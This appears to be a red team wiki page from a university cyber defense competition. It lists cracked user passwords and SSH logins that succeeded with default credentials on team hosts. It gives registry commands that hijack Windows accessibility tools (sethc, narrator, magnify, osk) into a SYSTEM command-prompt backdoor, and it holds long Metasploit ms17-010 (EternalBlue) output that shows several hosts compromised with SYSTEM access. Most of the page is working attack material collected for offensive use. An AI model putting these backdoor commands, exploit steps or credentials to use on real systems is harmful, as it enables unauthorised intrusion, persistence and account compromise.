Red Wiki

Competition Information
Flag Locations
Add content here...
Team Wiki Pages

Team 2:    None

Team 3:    None

Team 4:    None

Team 6:    mejaredbrees

Team 7:    None

Team 8:    None

Team 9:    None

Team 10:    None

Team 14:    None

Team 40:    None

General Help and Information
Due to download issues, put uploads here. Sorry about that - IScorE Dev Team
https://drive.google.com/drive/folders/17mzqbEGVvDC-zscF1qKheBBFLSlZ2cPD?usp=sharing



brakeman-results.out has code scan errors for the Canvas codebase.

a few cracked user accts /pws

lup39sex         (rreid)
mib23dez         (gbenjamin)
suz48dan         (sdavid)
boc41kim         (mgonzalez)
mam13kan         (jmitchell)
kiw33reg         (jvaldez)
koc15lix         (fsoto)
mah17jok         (cchavez)
moh16liz         (dcampbell)
peq14nuy         (rlloyd)
bod40jen         (bstevens)
lan17nox         (ajohnston)




Scenario: https://drive.google.com/open?id=16D9ujgxQUgh2CD3ynZ8PI5faefPi5S0f



[-] Found the following credentials
[-] Key: ! Sudo
[+] 3/www.team3.isucdc.com:22/Canvas SSH Succeeded!  Found credentials: cdc:cdc!
[+] 4/www.team4.isucdc.com:22/Canvas SSH Succeeded!  Found credentials: cdc:cdc!
[+] 6/www.team6.isucdc.com:22/Canvas SSH Succeeded!  Found credentials: cdc:cdc!
[+] 8/www.team8.isucdc.com:22/Canvas SSH Succeeded!  Found credentials: cdc:cdc!



Remote Desktop Backdoor method Edit registry

HotKeys - hit shift 5 times
reg ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "c:\Windows\system32\cmd.exe" /f
Click accessibiliy button then select narrator
reg ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v Debugger /t REG_SZ /d "c:\Windows\system32\cmd.exe" /f
Click accessibiliy button then select Magnify
reg ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /v Debugger /t REG_SZ /d "c:\Windows\system32\cmd.exe" /f
Click accessibiliy button then select narrator On screen keyboard
reg ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /t REG_SZ /d "c:\Windows\system32\cmd.exe" /f


top teams ms17-010 vulns (ipconfig execution = vuln) 

[*] 33.96.5.42:445        - Target OS: Windows Server 2016 Datacenter Evaluation 14393
[-] 33.96.5.42:445        - Unable to find accessible named pipe!
[*] 33.96.5.41:445        - Target OS: Windows Server 2016 Datacenter Evaluation 14393
[-] 33.96.5.41:445        - Unable to find accessible named pipe!
[*] Scanned  4 of 31 hosts (12% complete)
[*] 33.96.5.30:445        - Target OS: Windows Server 2016 Datacenter 14393
[*] 33.96.5.30:445        - Built a write-what-where primitive...
[+] 33.96.5.30:445        - Overwrite complete... SYSTEM session obtained!
[+] 33.96.5.30:445        - Service start timed out, OK if running a command or non-service executable...
[*] 33.96.5.30:445        - checking if the file is unlocked
[*] 33.96.5.30:445        - Getting the command output...
[*] 33.96.5.30:445        - Executing cleanup...
[+] 33.96.5.30:445        - Cleanup was successful
[+] 33.96.5.30:445        - Command completed successfuly!
[*] 33.96.5.30:445        - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 33.96.5.30
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 33.96.5.254

Tunnel adapter isatap.{AF1106AF-723F-4759-B24C-8A4E9AFEE5A7}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :


[*] 33.96.5.31:445        - Target OS: Windows Server 2016 Datacenter Evaluation 14393
[*] 33.96.5.31:445        - Built a write-what-where primitive...
[+] 33.96.5.31:445        - Overwrite complete... SYSTEM session obtained!
[+] 33.96.5.31:445        - Service start timed out, OK if running a command or non-service executable...
[*] 33.96.5.31:445        - checking if the file is unlocked
[*] 33.96.5.31:445        - Getting the command output...
[*] 33.96.5.31:445        - Executing cleanup...
[+] 33.96.5.31:445        - Cleanup was successful
[+] 33.96.5.31:445        - Command completed successfuly!
[*] 33.96.5.31:445        - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::7466:7c32:f017:24c5%6
   IPv4 Address. . . . . . . . . . . : 33.96.5.31
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 33.96.5.254

Tunnel adapter isatap.{6781869F-8713-45A1-A24C-5331AF95B932}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :


[-] 33.96.5.69:445        - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[*] Scanned  7 of 31 hosts (22% complete)
[*] 33.96.5.70:445        - Target OS: Windows Server 2016 Datacenter 14393
[-] 33.96.5.70:445        - Timeout::Error
[-] 33.96.5.70:445        - execution expired
[-] 33.96.5.70:445        - /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/sync/thread_safe.rb:36:in `select'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/sync/thread_safe.rb:36:in `select'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:75:in `rescue in read'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:69:in `read'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:159:in `block in timed_read'
/usr/lib/ruby/2.5.0/timeout.rb:108:in `timeout'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:158:in `timed_read'
/usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:72:in `smb_recv'
/usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:889:in `recv_transaction_data'
/usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:866:in `leak_frag_size'
/usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:351:in `exploit_matched_pairs'
/usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:44:in `eternal_pwn'
/usr/share/metasploit-framework/modules/auxiliary/admin/smb/ms17_010_command.rb:74:in `run_host'
/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:135:in `block (2 levels) in run'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
[-] 201.203.200.41:445    - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[-] 201.203.200.42:445    - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[*] Scanned 10 of 31 hosts (32% complete)
[*] 201.203.200.40:445    - Target OS: Windows Server 2016 Standard 14393
[-] 201.203.200.40:445    - Unable to find accessible named pipe!
[-] 201.203.200.70:445    - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[*] 201.203.200.30:445    - Target OS: Windows Server 2016 Standard 14393
[-] 201.203.200.30:445    - Unable to find accessible named pipe!
[*] Scanned 13 of 31 hosts (41% complete)
[*] 201.203.200.10:445    - Target OS: Windows 6.1
[-] 201.203.200.10:445    - Exploit unavailable for target OS.
[*] 201.203.200.20:445    - Target OS: Windows Server 2016 Standard 14393
[-] 201.203.200.20:445    - TypeError leaking initial Frag size, is the target patched?
[*] 200.2.96.42:445       - Target OS: Windows Server 2016 Datacenter 14393
[-] 200.2.96.42:445       - Unable to find accessible named pipe!
[*] Scanned 16 of 31 hosts (51% complete)
[-] 200.2.96.43:445       - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[-] 200.2.96.40:445       - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[*] 200.2.96.30:445       - Target OS: Windows Server 2016 Standard 14393
[-] 200.2.96.30:445       - Unable to find accessible named pipe!
[*] Scanned 19 of 31 hosts (61% complete)
[-] 200.2.96.70:445       - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[-] 200.2.96.32:445       - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[*] 200.2.96.41:445       - Target OS: Windows Server 2016 Datacenter 14393
[-] 200.2.96.41:445       - Unable to find accessible named pipe!
[*] Scanned 22 of 31 hosts (70% complete)
[*] 200.2.96.31:445       - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 200.2.96.31:445       - Built a write-what-where primitive...
[+] 200.2.96.31:445       - Overwrite complete... SYSTEM session obtained!
[+] 200.2.96.31:445       - Service start timed out, OK if running a command or non-service executable...
[*] 200.2.96.31:445       - checking if the file is unlocked
[*] 200.2.96.31:445       - Getting the command output...
[*] 200.2.96.31:445       - Executing cleanup...
[+] 200.2.96.31:445       - Cleanup was successful
[+] 200.2.96.31:445       - Command completed successfuly!
[*] 200.2.96.31:445       - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::809:2be6:b646:3142%4
   IPv4 Address. . . . . . . . . . . : 200.2.96.31
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 200.2.96.254

Tunnel adapter isatap.{2028FE47-A499-4D2E-97D7-3B13B7B9CEB1}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :


[*] 200.2.96.33:445       - Target OS: Windows 6.1
[-] 200.2.96.33:445       - Exploit unavailable for target OS.
[*] 49.49.33.41:445       - Target OS: Windows Server 2016 Standard 14393
[-] 49.49.33.41:445       - TypeError leaking initial Frag size, is the target patched?
[*] Scanned 25 of 31 hosts (80% complete)
[-] 49.49.33.43:445       - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[*] 49.49.33.20:445       - Target OS: Windows Server 2016 Datacenter 14393
[-] 49.49.33.20:445       - Unable to find accessible named pipe!
[-] 49.49.33.42:445       - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCESS_DENIED (Command=115 WordCount=0)
[*] Scanned 28 of 31 hosts (90% complete)
[*] 49.49.33.70:445       - Target OS: Windows Server 2012 R2 Datacenter 9600
[*] 49.49.33.70:445       - Built a write-what-where primitive...
[+] 49.49.33.70:445       - Overwrite complete... SYSTEM session obtained!
[+] 49.49.33.70:445       - Service start timed out, OK if running a command or non-service executable...
[*] 49.49.33.70:445       - checking if the file is unlocked
[*] 49.49.33.70:445       - Getting the command output...
[*] 49.49.33.70:445       - Executing cleanup...
[+] 49.49.33.70:445       - Cleanup was successful
[+] 49.49.33.70:445       - Command completed successfuly!
[*] 49.49.33.70:445       - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 49.49.33.70
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 49.49.33.254

Tunnel adapter isatap.{1F1C4CEF-4588-4FFA-8B89-9A7E08B3793F}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter 6TO4 Adapter:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : 2002:3131:2146::3131:2146
   Default Gateway . . . . . . . . . :


[*] 49.49.33.30:445       - Target OS: Windows Server 2016 Datacenter 14393
[-] 49.49.33.30:445       - Unable to find accessible named pipe!
[*] 49.49.33.100:445      - Target OS: Windows Server 2016 Datacenter 14393
[*] 49.49.33.100:445      - Built a write-what-where primitive...
[+] 49.49.33.100:445      - Overwrite complete... SYSTEM session obtained!
[+] 49.49.33.100:445      - Service start timed out, OK if running a command or non-service executable...
[*] 49.49.33.100:445      - checking if the file is unlocked
[*] 49.49.33.100:445      - Getting the command output...
[*] 49.49.33.100:445      - Executing cleanup...
[+] 49.49.33.100:445      - Cleanup was successful
[+] 49.49.33.100:445      - Command completed successfuly!
[*] 49.49.33.100:445      - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 49.49.33.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 49.49.33.254

Tunnel adapter Reusable ISATAP Interface {A118EA7A-D922-4489-9C9D-D16A375AD4C3}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :